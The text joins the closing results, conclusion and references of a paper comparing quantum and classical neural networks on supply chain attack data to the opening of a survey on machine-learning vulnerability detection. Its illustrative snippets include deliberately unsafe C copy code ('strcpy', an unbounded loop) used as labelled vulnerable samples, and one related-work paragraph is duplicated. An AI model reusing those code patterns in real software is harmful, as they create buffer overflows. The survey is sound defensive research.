The quantum machine learning model is an emerging approach, and extensive experiments on the effect of dataset proportion on its performance have yet to be conducted. In this study, we emphasized experimenting with the quantum machine learning model on different ratios of a dataset and observed how QML works with different ratios of the dataset. Further, we conducted a comparative analysis between the performance of the quantum machine learning model and the classical machine learning model, to check how the traditional machine learning model works in comparison with the quantum machine learning model.

In accordance with the experiment, QML seems to be little influenced by the various ratios of data in terms of accuracy; however, the efficiency metric is applicable in that case, as the efficiency drops with the bigger proportion of the dataset up to a certain limit. The proportions we chose are 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, and 100 percent. The accuracy we found is random, and the execution time decreases from 15 percent of the data to 80 percent of the data; then it starts to increase again and continues until 100 percent. The accuracy of the classical machine learning model is also random, but its efficiency starts to drop with the higher ratio of the dataset.

The accuracy, F1 score, precision, and recall results show that, for both the quantum machine learning neural network model and the classical machine learning model, the various portions of the dataset have no impact; the results show a random pattern throughout the entire dataset. However, we found two specific patterns in the execution-time results for the two models. For the QNN, the execution time decreases with the increasing portion of the dataset until a certain threshold of data proportion, for a large number of instances. For the second model, the execution time increases with the increasing proportion of the dataset. Therefore, the required execution time behaves in opposite ways for the quantum machine learning model and the classical neural network model on the software vulnerability dataset.

VI. CONCLUSION

Recently, quantum computing has become a prominent topic, with opportunities in the computation of machine learning algorithms that have solved complex problems. This paper conducted a comparative study of quantum neural networks (QNN) and traditional neural networks (NN) and analyzed the performance of both models using a software supply chain attack dataset. Due to the limited availability of quantum computers, the QML model was applied on the open-source Pennylane simulator. We utilized accuracy and processing metrics for evaluating the models' performance. The experimental results indicate that QNN and NN differ in execution time, where the QNN model requires considerably more time than the NN model. However, the execution time for QNN decreases with a higher proportion of the dataset, while the execution time for NN increases with a higher percentage of the dataset. Although quantum machine learning has been growing rapidly over the last few decades, advancement is still required, as the current generation of quantum simulators comes with a limited number of qubits, which is not adequate for software supply chain attack data. A larger number of qubits converging with quantum machine learning models may play a big role in improving classification performance and reducing computation time.

ACKNOWLEDGEMENT

The work is partially supported by the U.S. National Science Foundation Awards 2209638, 2209636, and 2209637. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the National Science Foundation.

REFERENCES

[1] M. Mohammad et al., "Quantum Machine Learning for Software Supply Chain Attacks: How Far Can We Go?," 2022. [Online]. Available: https://arxiv.org/abs/2204.02784
[2] A. Jain et al., "Overview and Importance of Data Quality for Machine Learning Tasks," Proc. ACM SIGKDD Int. Conf. Knowl. Discov. Data Min., pp. 3561–3562, 2020, doi: 10.1145/3394486.3406477.
[3] M. Hilbert and P. López, "The world's technological capacity to store, communicate, and compute information," Science, vol. 332, no. 6025, pp. 60–65, 2011, doi: 10.1126/science.1200970.
[4] T. M. Khan and A. Robles-Kelly, "Machine Learning: Quantum vs Classical," IEEE Access, vol. 8, pp. 219275–219294, 2020, doi: 10.1109/ACCESS.2020.3041719.
[5] V. Giovannetti, S. Lloyd, and L. MacCone, "Quantum random access memory," Phys. Rev. Lett., vol. 100, no. 16, 2008, doi: 10.1103/PhysRevLett.100.160501.
[6] C. Ciliberto et al., "Quantum machine learning: A classical perspective," Proc. R. Soc. A Math. Phys. Eng. Sci., vol. 474, no. 2209, 2018, doi: 10.1098/rspa.2017.0551.
[7] H. Y. Huang et al., "Power of data in quantum machine learning," Nat. Commun., vol. 12, no. 1, 2021, doi: 10.1038/s41467-021-22539-9.
[8] D. Ristè et al., "Demonstration of quantum advantage in machine learning," npj Quantum Inf., vol. 3, no. 1, 2017, doi: 10.1038/s41534-017-0017-3.
[9] A. Manzari, "Quantum Machine Learning: A Roadmap For Technologists," Quantum Strategy Institute, 2022. [Online]. Available: https://quantumstrategyinstitute.com/2022/02/28/quantum-machine-learning-a-roadmap-for-technologists/
[10] H. Alyami et al., "The evaluation of software security through quantum computing techniques: A durability perspective," Appl. Sci., vol. 11, no. 24, 2021, doi: 10.3390/app112411784.
[11] L. Gyongyosi and S. Imre, "A Survey on quantum computing technology," Comput. Sci. Rev., vol. 31, pp. 51–71, 2019, doi: 10.1016/j.cosrev.2018.11.002.
[12] T. D. Ladd, F. Jelezko, R. Laflamme, Y. Nakamura, C. Monroe, and J. L. O'Brien, "Quantum computers," Nature, vol. 464, no. 7285, pp. 45–53, 2010, doi: 10.1038/nature08812.
[13] M. Schuld, I. Sinayskiy, and F. Petruccione, "An introduction to quantum machine learning," Contemp. Phys., vol. 56, no. 2, pp. 172–185, 2015, doi: 10.1080/00107514.2014.964942.
[14] M. A. Nielsen, I. Chuang, and L. K. Grover, "Quantum Computation and Quantum Information," Am. J. Phys., vol. 70, no. 5, pp. 558–559, 2002, doi: 10.1119/1.1463744.
[15] Cybersecurity and Infrastructure Security Agency, "Defending Against Software Supply Chain Attacks," April 2021.
[16] A. L. Buczak and E. Guven, "A Survey of Data Mining and Machine Learning Methods for Cyber Security Intrusion Detection," IEEE Commun. Surv. Tutorials, vol. 18, no. 2, pp. 1153–1176, 2016, doi: 10.1109/COMST.2015.2494502.
[17] H. F. Md Jobair, M. Tasnim, H. Shahriar, M. Valero, A. Rahman, and F. Wu, "Investigating Novel Approaches to Defend Software Supply Chain Attacks," 33rd IEEE Int. Symp. Softw. Reliab. Eng., 2022.
[18] L. Portnoy, E. Eskin, and S. Stolfo, "Intrusion detection with unlabeled data using clustering," Proc. ACM CSS Workshop Data Mining Applied to Security, Philadelphia, PA, pp. 1–25, 2001.
[19] V. Mkrttchian, S. Kanarev, and L. A. Gamidullaeva, "Machine Learning and Cyber Security," Encycl. Crim. Act. Deep Web, pp. 1034–1042, 2020, doi: 10.4018/978-1-5225-9715-5.ch070.
[20] K. Shaukat, S. Luo, V. Varadharajan, I. A. Hameed, and M. Xu, "A Survey on Machine Learning Techniques for Cyber Security in the Last Decade," IEEE Access, vol. 8, pp. 222310–222354, 2020, doi: 10.1109/ACCESS.2020.3041951.
[21] G. Apruzzese, M. Colajanni, L. Ferretti, A. Guido, and M. Marchetti, "On the effectiveness of machine and deep learning for cyber security," Int. Conf. Cyber Conflict (CYCON), vol. 2018-May, pp. 371–389, 2018, doi: 10.23919/CYCON.2018.8405026.
[22] M. J. Hossain Faruk et al., "Malware Detection and Prevention using Artificial Intelligence Techniques," in Proc. 2021 IEEE Int. Conf. Big Data, 2022, pp. 5369–5377, doi: 10.1109/bigdata52589.2021.9671434.
[23] M. Masum et al., "Bayesian Hyperparameter Optimization for Deep Neural Network-Based Network Intrusion Detection," Proc. 2021 IEEE Int. Conf. Big Data, pp. 5413–5419, 2021, doi: 10.1109/BigData52589.2021.9671576.
[24] M. Masum, M. J. Hossain Faruk, H. Shahriar, K. Qian, D. Lo, and M. I. Adnan, "Ransomware Classification and Detection With Machine Learning Algorithms," pp. 0316–0322, 2022, doi: 10.1109/ccwc54503.2022.9720869.
[25] C. Havenstein, D. Thomas, S. Chandrasekaran, C. L. Havenstein, and D. T. Thomas, "Comparisons of Performance between Quantum and Classical Machine Learning," SMU Data Sci. Rev., vol. 1, no. 4, p. 11, 2018. [Online]. Available: https://scholar.smu.edu/datasciencereview/vol1/iss4/11
[26] Y. Wang, H. Tang, J. Huang, T. Wen, J. Ma, and J. Zhang, "A comparative study of different machine learning methods for reservoir landslide displacement prediction," Eng. Geol., vol. 298, 2022, doi: 10.1016/j.enggeo.2022.106544.
[27] H. F. Md Jobair, T. Sharaban, T. Masrura, S. Hossain, and S. Nazmus, "A Review of Quantum Cybersecurity: Threats, Risks and Opportunities," 2022.
[28] Y. Kwak, W. J. Yun, S. Jung, and J. Kim, "Quantum Neural Networks: Concepts, Applications, and Challenges," in Int. Conf. Ubiquitous and Future Networks (ICUFN), 2021, pp. 413–416, doi: 10.1109/ICUFN49451.2021.9528698.
[29] A. Kariya and B. K. Behera, "Investigation of Quantum Support Vector Machine for Classification in NISQ era," 2021. [Online]. Available: http://arxiv.org/abs/2112.06912
[30] A. Kumar, K. S. Kuppusamy, and G. Aghila, "A learning model to detect maliciousness of portable executable using integrated feature set," J. King Saud Univ. - Comput. Inf. Sci., vol. 31, no. 2, pp. 252–265, 2019, doi: 10.1016/j.jksuci.2017.01.003.
[31] A. Ullah, K. J. R. Espinosa, P. O. Dral, A. A. Kananenka, et al., "A comparative study of different machine learning methods for dissipative quantum dynamics," 2022.
[32] M. S. Akter, H. Shahriar, R. Chowdhury, and M. Mahdy, "Forecasting the risk factor of frontier markets: A novel stacking ensemble of neural network approach," Future Internet, vol. 14, no. 9, p. 252, 2022.
[33] D. S. Depto, S. Rahman, M. M. Hosen, M. S. Akter, T. R. Reme, A. Rahman, H. Zunair, M. S. Rahman, and M. Mahdy, "Automatic segmentation of blood cells from microscopic slides: a comparative analysis," Tissue and Cell, vol. 73, p. 101653, 2021.
[34] K. R. R. Turjo, P. A. D'Costa, S. Bhowmick, A. Galib, S. Raian, M. S. Akter, N. Ahmed, and M. Mahdy, "Design of low-cost smart safety vest for the prevention of physical abuse and sexual harassment," in 2021 24th Int. Conf. Computer and Information Technology (ICCIT), pp. 1–6, IEEE, 2021.
2306.11673

A Survey on Automated Software Vulnerability Detection Using Machine Learning and Deep Learning

NIMA SHIRI HARZEVILI, York University, Canada
ALVINE BOAYE BELLE, York University, Canada
JUNJIE WANG, Institute of Software, Chinese Academy of Sciences, China
SONG WANG, York University, Canada
ZHEN MING (JACK) JIANG, York University, Canada
NACHIAPPAN NAGAPPAN, Meta, USA

Software vulnerability detection is critical in software security because it identifies potential bugs in software systems, enabling immediate remediation and mitigation measures to be implemented before they may be exploited. Automatic vulnerability identification is important because it can evaluate large codebases more efficiently than manual code auditing. Many Machine Learning (ML) and Deep Learning (DL) based models for detecting vulnerabilities in source code have been presented in recent years. However, a survey that summarises, classifies, and analyses the application of ML/DL models for vulnerability detection is missing. It may be difficult to discover gaps in existing research and potential for future improvement without a comprehensive survey. This could result in essential areas of research being overlooked or under-represented, leading to a skewed understanding of the state of the art in vulnerability detection. This work addresses that gap by presenting a systematic survey to characterize various features of ML/DL-based source code level software vulnerability detection approaches via five primary research questions (RQs). Specifically, our RQ1 examines the trend of publications that leverage ML/DL for vulnerability detection, including the evolution of research and the distribution of publication venues. RQ2 describes vulnerability datasets used by existing ML/DL-based models, including their sources, types, and representations, as well as analyses of the embedding techniques used by these approaches. RQ3 explores the model architectures and design assumptions of ML/DL-based vulnerability detection approaches. RQ4 summarises the type and frequency of vulnerabilities that are covered by existing studies. Lastly, RQ5 presents a list of current challenges to be researched and an outline of a potential research roadmap that highlights crucial opportunities for future work.

CCS Concepts: • Security and privacy → Software security engineering.

Additional Key Words and Phrases: source code, software security, software vulnerability detection, software bug detection, machine learning, deep learning

ACM Reference Format:
Nima Shiri Harzevili, Alvine Boaye Belle, Junjie Wang, Song Wang, Zhen Ming (Jack) Jiang, and Nachiappan Nagappan. 2018. A Survey on Automated Software Vulnerability Detection Using Machine Learning and Deep Learning. J. ACM 37, 4, Article 111 (August 2018), 37 pages. https://doi.org/XXXXXXX.XXXXXXX

Authors' addresses: Nima Shiri Harzevili, nshiri@yorku.ca, York University, 4700 Keele St., North York, Ontario, Canada, M3J 1P3; Alvine Boaye Belle, York University, 4700 Keele St., North York, Canada, alvine.belle@lassonde.yorku.ca; Junjie Wang, Institute of Software, Chinese Academy of Sciences, Beijing, China, junjie@iscas.ac.cn; Song Wang, York University, 4700 Keele St., North York, Canada, wangsong@yorku.ca; Zhen Ming (Jack) Jiang, York University, 4700 Keele St., North York, Canada, zmjiang@eecs.yorku.ca; Nachiappan Nagappan, Meta, Seattle, USA, nachiappan.nagappan@gmail.com.

Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than ACM must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from permissions@acm.org.
© 2018 Association for Computing Machinery. 0004-5411/2018/8-ART111 $15.00. https://doi.org/XXXXXXX.XXXXXXX

1 INTRODUCTION

Automatic detection of software security vulnerabilities is a critical component of assuring software security. Machine Learning (ML) and Deep Learning (DL) breakthroughs have sparked great interest in employing these models to discover software vulnerabilities in general software systems [28, 79, 84, 137, 145]. ML/DL models excel at discovering subtle patterns and correlations from large datasets. They can automatically extract meaningful features from raw data, such as source code, and identify hidden patterns that may indicate software vulnerabilities. This capability is crucial in vulnerability detection, as vulnerabilities often involve subtle code characteristics and dependencies. Also, ML/DL models can handle a wide range of data types and formats, including source code [32, 33, 64, 95, 128, 134, 138, 144], textual information [60], and numerical features such as commit characteristics [113, 147]. They can process and analyze these data representations to detect vulnerabilities effectively. This flexibility allows researchers to leverage various sources of data and incorporate different features for comprehensive vulnerability detection.

The overall process to leverage ML/DL models for software vulnerability detection is as follows. Data collection: The first step toward building a vulnerability detection model is to collect relevant vulnerable data for training the models. There are multiple sources for vulnerability detection datasets (we elaborate on this in RQ2); researchers either use benchmark data [17, 42, 49, 76, 87, 88, 140, 147, 157, 158, 160] or collect from the open source [25, 45, 110, 114, 120], based on the requirements and the type of vulnerabilities. Data representation: Once the data is collected, it needs to be preprocessed to prepare it for training. The preprocessing includes using appropriate representation techniques, i.e., graph/tree representation [17, 30, 38, 49, 82, 87, 90, 91, 97, 140, 153, 156, 157, 160], token representation [25, 42, 55, 58, 62, 76, 124, 158, 161], or using commit characteristics. Embedding: This step involves converting the source code representation into a numerical format [17, 45, 49, 55, 58, 62, 76, 91, 114, 124, 161] (vectors or embeddings) that can be utilized by machine learning or deep learning models for vulnerability detection. Model selection and architecture design: A suitable ML/DL model must be chosen based on the software vulnerability detection task. This can include everything from simple ML algorithms like SVM or Random Forests [24, 123, 155] to more advanced DL architectures like CNNs [60, 62, 145] or RNNs. The architecture of the model is intended to extract significant characteristics and patterns from the input data. Training: In the training phase, the vulnerability detection dataset is separated into training and validation sets, and the model learns from labeled data. The model's parameters are updated iteratively depending on the prediction errors, using optimization techniques such as gradient descent. Evaluation and validation: Once the training is finished, the model's performance is evaluated using a separate test dataset. Various metrics such as accuracy, precision, recall, and F1 score are calculated to assess the model's effectiveness in detecting vulnerabilities. The model may also be validated against real-world vulnerabilities to measure its practical utility.
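As a toy illustration of the representation and embedding steps in this pipeline (not any specific surveyed approach), the sketch below lexes functions into tokens and learns token embeddings with gensim's Word2Vec. The regex tokenizer and the two sample functions are stand-ins for the lexers and corpora used in the surveyed papers.

# Token representation + Word2Vec embedding of source code (illustrative sketch).
import re
from gensim.models import Word2Vec

def tokenize(source: str):
    # split identifiers, numbers, and punctuation into separate tokens
    return re.findall(r"[A-Za-z_]\w*|\d+|[^\sA-Za-z_\d]", source)

functions = [
    "void copy(char *dst, char *src) { strcpy(dst, src); }",   # toy vulnerable sample
    "int add(int a, int b) { return a + b; }",                  # toy benign sample
]
corpus = [tokenize(f) for f in functions]

# 100-dimensional token embeddings; a real study trains on thousands of functions
emb = Word2Vec(sentences=corpus, vector_size=100, window=5, min_count=1)
vec = emb.wv["strcpy"]          # embedding vector for a single token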
Although many studies have utilized ML/DL to detect software vulnerabilities, there has not been a comprehensive review to consolidate the various approaches and characteristics of these techniques. Conducting such a systematic survey would be beneficial for practitioners and researchers to gain a better understanding of the current state-of-the-art tools for vulnerability detection, and could serve as inspiration for future studies. This study conducts a detailed and comprehensive survey to review, analyze, describe, and classify vulnerability detection papers from different perspectives. We analyzed 67 articles published in 37 flagship SE journals and conferences from 2011 to 2022. We investigated the following research questions (RQs) in this study:

• RQ1: What is the trend of studies using ML/DL models for vulnerability detection?
  – RQ1.1. What are the trends of studies in software vulnerability detection over time?
  – RQ1.2. What is the distribution of the publication venues?
• RQ2: What are the characteristics of experiment datasets used in software vulnerability detection?
  – RQ2.1. What is the source of data?
  – RQ2.2. What are the types of data used in primary studies?
  – RQ2.3. How are input data represented?
  – RQ2.4. How are input data embedded for the feature space?
• RQ3. What are the different ML/DL models used for vulnerability detection?
• RQ4. What are the most frequent types of vulnerabilities covered in these studies?
• RQ5. What are possible challenges and open directions in software vulnerability detection?

This paper makes the following contributions:

• We thoroughly analyzed 67 relevant studies that used ML/DL techniques to detect security vulnerabilities regarding publication trends, distribution of publication venues, and types of contributions.
• We conducted a comprehensive analysis to understand the dataset, the processing of data, data representation, model architecture, model interpretability, and the types of involved vulnerabilities of these ML/DL-based vulnerability detection techniques.
• We provided a classification of ML/DL models used in vulnerability detection based on their architectures and an analysis of the technique selection strategy of these models.
• We discuss distinct technical challenges of using ML/DL techniques in vulnerability detection and outline key future directions.
• We have shared our results and analysis data as a replication package¹ to allow other researchers to easily follow this paper and extend it.

We believe that this work is useful for researchers and practitioners in the field of software engineering and cybersecurity, particularly those with an interest in software vulnerability detection and mitigation. In addition, the findings of our systematic survey may also be useful to policymakers, software vendors, and other stakeholders who are concerned with improving software security and reducing the risk of cyberattacks. These individuals may use the insights provided by the review to inform their decisions about software development, procurement, and risk management.

The remaining part of this paper is organized as follows: Section 2 presents related work on systematic surveys for software vulnerability detection using ML/DL techniques. Section 3 presents the research methodology proposed in this paper for paper collection and the criteria for including and excluding studies. Section 4 addresses the research questions and corresponding results. Section 5 discusses the possible limitations of this systematic survey. Finally, Section 6 discusses the conclusion and future directions.

¹ https://colab.research.google.com/drive/1O42duwz34H3fRoyfA37EU6Ig2u16R1Lb?usp=sharing
2 BACKGROUND AND RELATED WORK

In this section of the paper, we first provide background on the definition of vulnerability and the different steps in software vulnerability detection. Then we discuss the related surveys and highlight their differences compared to our survey.

2.1 Background

Software vulnerability management is now essential for guaranteeing the security and integrity of software systems [20, 43, 119, 135]. Given the increasing reliance on software for many critical processes such as financial transactions [57, 99], autonomous driving [46, 100], and mission-critical systems [53, 56], the frequency of vulnerabilities poses serious risks. Software vulnerabilities can be exploited by malicious entities to gain unauthorized access, compromise sensitive information, or disrupt services if they go undetected or ignored [56]. As a result, excellent software vulnerability management is crucial to handling these risks, preserving user privacy [5], maintaining system availability, and assuring software application trustworthiness [104]. By proactively detecting, analyzing, and remediating vulnerabilities, organizations may strengthen their software systems against changing cybersecurity threats [6] and adhere to industry best practices for safe software development and deployment.

There are multiple steps in software vulnerability management, including vulnerability detection [17], vulnerability analysis [73], and vulnerability remediation [77]. In the following subsections, we elaborate on each step in detail.

2.1.1 Vulnerability detection. Vulnerability detection is critical in the overall process of managing software vulnerabilities [17, 28, 64, 87, 90, 95, 134, 136, 158, 160]. It comprises detecting and investigating possible security weaknesses in software systems that attackers may exploit. There are several traditional techniques commonly used for vulnerability detection:

Manual Code Auditing [7, 18, 126, 127, 130]: In this method, human experts examine the source thoroughly with the goal of manually detecting coding flaws, unsafe procedures, and possible vulnerabilities. Manual code review is time-consuming and requires the knowledge of qualified developers or security analysts. However, it provides a thorough grasp of the code and can reveal subtle bugs that automated tools may overlook.

Static Analysis [39, 41, 75, 103, 129, 139]: Static analysis involves using automated tools to analyze the source code or compiled binaries without executing the software. It examines the code structure, identifies potential coding issues, and detects common vulnerabilities such as buffer overflows [56], injection attacks, and insecure data handling. Static analysis tools employ various techniques like data flow analysis, control flow analysis, and pattern matching to identify potential vulnerabilities. They can help scale vulnerability detection efforts by analyzing large codebases efficiently.

Dynamic Analysis [15, 81, 106]: The goal of dynamic analysis is to evaluate the behavior of software while it is running. It entails running the software in a controlled environment or through automated tests while monitoring its execution and interactions with system resources.
Dynamic analysis can detect bugs in input validation [70], access control, and error handling. By analyzing the real-time behavior of the software, this approach can identify vulnerabilities that static analysis alone cannot detect. However, dynamic analysis may have constraints in terms of significant system overhead [149].

2.1.2 Vulnerability analysis. After the detection of vulnerabilities, the subsequent step in software vulnerability management is vulnerability analysis and assessment [44, 63, 78, 80, 101, 131, 148]. This step involves further examining the identified vulnerabilities to assess their severity, impact, and potential exploitability.

Severity: Accurately assessing software vulnerabilities is vital for several reasons. Firstly, it allows organizations to prioritize their response based on the severity of the vulnerabilities. Severity refers to the potential impact a vulnerability could have if exploited [23, 73, 74, 133]. By accurately assessing the severity, organizations can focus their attention on high-severity vulnerabilities that pose significant risks to the security and functionality of the software system.

Impact: Secondly, accurately assessing vulnerabilities helps determine the potential impact they may have on the organization [27, 47, 51, 65]. The term impact refers to the repercussions of exploiting a vulnerability, such as denial of service [56] or data breaches [1]. By understanding the potential impact, organizations can make informed decisions regarding the urgency and priority of remediation efforts.
Exploitability: Furthermore, accurately assessing vulnerabilities aids in understanding their potential exploitability [13, 21, 22]. This entails determining the possibility that an attacker will be successful in exploiting the vulnerability to infiltrate the software system. Organizations can estimate the amount of risk associated with each vulnerability and invest resources accordingly by evaluating criteria such as the ease of exploitation and the availability of exploit techniques.

2.1.3 Vulnerability remediation. The process of addressing detected software vulnerabilities by different techniques such as patching, code modification, and repairing is referred to as software vulnerability remediation [8, 16, 26, 117]. The fundamental goal of remediation is to eliminate or mitigate vulnerabilities in order to improve the software system's security and dependability. One common approach to vulnerability remediation is applying patches provided by software vendors or open-source communities [50, 83, 141]. Patches are updates or fixes that address specific vulnerabilities or weaknesses identified in a software system.

2.1.4 ML/DL for software vulnerability detection. By utilizing data analysis, pattern recognition, and machine-driven learning for finding software security vulnerabilities, ML/DL approaches have revolutionized software vulnerability detection [28, 79, 84, 137, 145]. These techniques improve the accuracy and efficiency of vulnerability detection, potentially allowing for automated detection, faster analysis, and the identification of previously undisclosed vulnerabilities.

One common application of ML/DL in vulnerability detection is the classification of code snippets [32, 64, 128, 138], software binaries [61, 109, 116, 145], or code changes mined from open-source repositories such as GitHub or CVE [35, 60, 85, 94, 118, 123, 136, 154]. ML models can be trained on labeled datasets, where each sample represents a known vulnerability or non-vulnerability. These models then learn to generalize from the provided examples and classify new instances based on the patterns they have learned. This method allows for automatic vulnerability discovery without the need for manual examination, considerably lowering the time and effort necessary for analysis.

ML/DL models for detecting software vulnerabilities have promising advantages over traditional methodologies. Each benefit is discussed in depth below.

Automation: Automation is a significant advantage. ML models can automatically scan and analyze large codebases, network traffic logs, or system configurations, flagging potential vulnerabilities without requiring human intervention for each individual case [19]. This automation speeds up the detection process, allowing security teams to focus on verifying and mitigating vulnerabilities rather than manual analysis.

Performance: ML/DL approaches offer faster analysis. Traditional vulnerability detection methods rely on manual inspection or the application of predefined rules [7, 18, 126, 127, 130]. In contrast, ML/DL approaches can evaluate enormous volumes of data in parallel and generate predictions fast, dramatically shortening the time necessary to find vulnerabilities.

Detection effectiveness: ML/DL models can uncover previously unknown vulnerabilities, commonly known as zero-day vulnerabilities [10]. By learning patterns and generalizing from labeled data, these models may uncover signs of vulnerabilities even when they have not been specifically trained on them. This capability improves the overall security posture by helping to identify and address unknown weaknesses in software before they are exploited by attackers [2].
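In its simplest form, the classification workflow sketched above reduces to fitting a classifier on embedded samples and reporting the metrics the surveyed studies use. In the sketch below, the random features and labels are placeholders for real embedded code samples.

# Train/evaluate a simple vulnerability classifier and report the usual metrics.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import (accuracy_score, f1_score,
                             precision_score, recall_score)
from sklearn.model_selection import train_test_split

X = np.random.rand(200, 100)            # stand-in for embedded code samples
y = np.random.randint(0, 2, 200)        # 1 = vulnerable, 0 = clean (placeholder labels)

X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.2, random_state=0)
clf = RandomForestClassifier(random_state=0).fit(X_tr, y_tr)
pred = clf.predict(X_te)

print("accuracy :", accuracy_score(y_te, pred))
print("precision:", precision_score(y_te, pred))
print("recall   :", recall_score(y_te, pred))
print("f1       :", f1_score(y_te, pred))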
2.2 Related work

There have been several existing survey papers on software vulnerabilities in the literature. In this section, we analyze the existing papers based on different aspects, as shown in Table 1.

Table 1. Comparison of contributions between our survey and the existing related surveys/reviews.

No   Studies                   Data Source   Representation   Embedding   Models   Vulnerability Types   Interpretability
1    Triet et al. [77]         ✓             ×                ✓           ✓        ×                     ×
2    Ghaffarian et al. [48]    ✓             ✓                ✓           ✓        ×                     ×
3    Lin et al. [89]           ✓             ✓                ✓           ✓        ×                     ×
4    Zeng et al. [151]         ✓             ✓                ✓           ✓        ×                     ×
5    Semasaba et al. [125]     ✓             ✓                ×           ✓        ✓                     ×
6    Sun et al. [132]          ✓             ×                ×           ×        ✓                     ×
7    Kritikos et al. [71]      ✓             ×                ×           ×        ✓                     ×
8    Khan et al. [69]          ×             ×                ×           ×        ×                     ×
9    Nong et al. [111]         ×             ×                ×           ×        ×                     ×
10   Chakraborty et al. [19]   ×             ×                ×           ×        ×                     ×
11   Liu et al. [93]           ×             ×                ×           ×        ×                     ×
12   Bi et al. [9]             ×             ×                ×           ×        ×                     ×
13   Our survey                ✓             ✓                ✓           ✓        ✓                     ✓

The columns in the table represent different aspects of the surveys, such as the data source used, representation, feature embedding, ML/DL models, vulnerability types, and interpretability of ML/DL models. Data Source indicates whether the survey reviewed vulnerability detection data sources. Representation discusses whether the survey considered source code representation in its analysis. Embedding deals with whether the survey analyzed feature embedding in its analysis. The table also considers ML/DL models in the sixth column as ML Models. The table also checks whether the survey considers vulnerability types based on Common Weakness Enumeration (CWE)
numbers. The last column indicates whether the survey takes into account the interpretability of ML/DL models.

Ghaffarian et al. [48] is the closest survey to ours when it comes to data-driven security vulnerability detection. In their survey, they analyzed data-driven software vulnerability detection from various aspects, including data sources, representation, embedding types, and different ML/DL models, as shown in Table 1. However, there are a couple of differences compared to our work. Specifically, this work also surveys vulnerability detection from the following aspects. Comprehensive coverage: Understanding the many sorts of vulnerabilities allows researchers to create and develop effective vulnerability detection models that can thoroughly discover security vulnerabilities. To guarantee that their detection systems cover as many vulnerability types as possible, researchers must be familiar with the various methods of attack and potential weaknesses in software systems. Customization of detection techniques: Different sorts of vulnerabilities necessitate distinct detection methods. To build specialized detection systems that can discover certain types of vulnerabilities, researchers must first understand the subtleties of each vulnerability type. Prioritization of mitigation efforts: Researchers can prioritize mitigation efforts depending on the severity and effect of each vulnerability by understanding the many types of vulnerabilities. Critical vulnerabilities that pose the greatest danger to the system or organization can be prioritized by researchers. Better understanding of attack patterns: Understanding the different types of vulnerabilities provides researchers with insights into the different attack patterns used by attackers. This knowledge helps researchers design detection techniques that can detect not only known attack patterns but also new, unknown patterns. Interpretability refers to the ability to explain how a model makes a particular decision or prediction. This is particularly important in the context of software vulnerability detection because security researchers need to be able to understand why a model is flagging a particular piece of code as potentially vulnerable. Additionally, interpretability can help improve trust in the model's predictions. If developers and security researchers can understand how a model is making its decisions, they are more likely to trust its output and take appropriate actions based on its recommendations.

Triet et al. [77] reviewed data-driven vulnerability assessment and prioritization studies. They conduct a review of prior research on software assessment and prioritization that leverages machine learning and data mining methods. They examine various types of research in this area, discuss the strengths and weaknesses of each approach, and highlight some unresolved issues and potential areas for future research. The major difference to ours is that we review vulnerability detection approaches while they survey assessment and prioritization techniques. Vulnerability detection, vulnerability assessment, and vulnerability prioritization are all important components of the vulnerability management life-cycle, but they involve different stages of the vulnerability management process. Our work focuses on vulnerability detection, which refers to the process of identifying potential vulnerabilities in software systems. The goal of vulnerability detection is to identify all vulnerabilities that exist within the system, regardless of their severity. Vulnerability assessment, on the other hand, involves evaluating the severity and potential impact of each identified vulnerability.
Triet et al. [77] reviewed data-driven vulnerability assessment and prioritization studies. They conducted a review of prior research on software vulnerability assessment and prioritization that leverages machine learning and data mining methods. They examined various types of research in this area, discussed the strengths and weaknesses of each approach, and highlighted some unresolved issues and potential areas for future research. The major difference to ours is that we review vulnerability detection approaches while they survey assessment and prioritization techniques. Vulnerability detection, vulnerability assessment, and vulnerability prioritization are all important components of the vulnerability management life cycle, but they involve different stages of the vulnerability management process. Our work focuses on vulnerability detection, which refers to the process of identifying potential vulnerabilities in software systems. The goal of vulnerability detection is to identify all vulnerabilities that exist within the system, regardless of their severity. Vulnerability assessment, on the other hand, involves evaluating the severity and potential impact of each identified vulnerability. This assessment can involve analyzing factors such as the likelihood of the vulnerability being exploited and the potential harm that could result. Vulnerability prioritization involves ranking the identified vulnerabilities based on their level of risk or criticality. This ranking is typically based on the results of the vulnerability assessment, as well as other factors such as the availability of resources to address the vulnerabilities.

Lin et al. [89] examined the literature on using deep learning and neural network-based approaches for detecting software vulnerabilities. There are a couple of differences compared to our survey. First, their survey covers conventional source code representation techniques (static code attributes) for software vulnerability detection, which we deliberately exclude for several reasons. Static code attributes, such as code length or complexity, may not be effective for vulnerability detection because they do not capture the dynamic behavior of the code at runtime. Vulnerabilities can manifest themselves in unexpected ways that are not apparent in the static code, making it difficult to detect them through static analysis alone. Additionally, static code attributes may not be able to capture the context of the code, which is important for understanding how the code interacts with other components in a system. Finally, static analysis tools may produce a high rate of false positives, which can be time-consuming to verify and may cause developers to ignore important vulnerabilities.
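Before turning to the second difference, the short sketch below makes concrete what such static code attributes look like. It computes a handful of shallow, structure-only features for a code snippet; the attribute set is a hypothetical illustration, not one taken from Lin et al. [89] or any other surveyed work.

```python
# Illustrative sketch: shallow "static code attributes" of the kind our survey
# excludes. The chosen attributes are hypothetical examples, not taken from
# any surveyed paper.
import re

KEYWORDS = re.compile(r"\b(?:if|for|while|case)\b")  # branching keywords
SHORT_CIRCUIT = re.compile(r"&&|\|\|")               # boolean connectives

def static_attributes(source: str) -> dict:
    """Compute structure-only features for a (C-like) code snippet."""
    lines = [ln for ln in source.splitlines() if ln.strip()]
    tokens = re.findall(r"[A-Za-z_]\w*|\S", source)
    # decision points + 1 roughly approximates McCabe cyclomatic complexity
    decisions = len(KEYWORDS.findall(source)) + len(SHORT_CIRCUIT.findall(source))
    return {"loc": len(lines), "tokens": len(tokens), "complexity": decisions + 1}

snippet = '''
int copy(char *dst, const char *src) {
    while (*src) { *dst++ = *src++; }   /* no bounds check */
    return 0;
}
'''
print(static_attributes(snippet))  # e.g. {'loc': 4, ..., 'complexity': 2}
```

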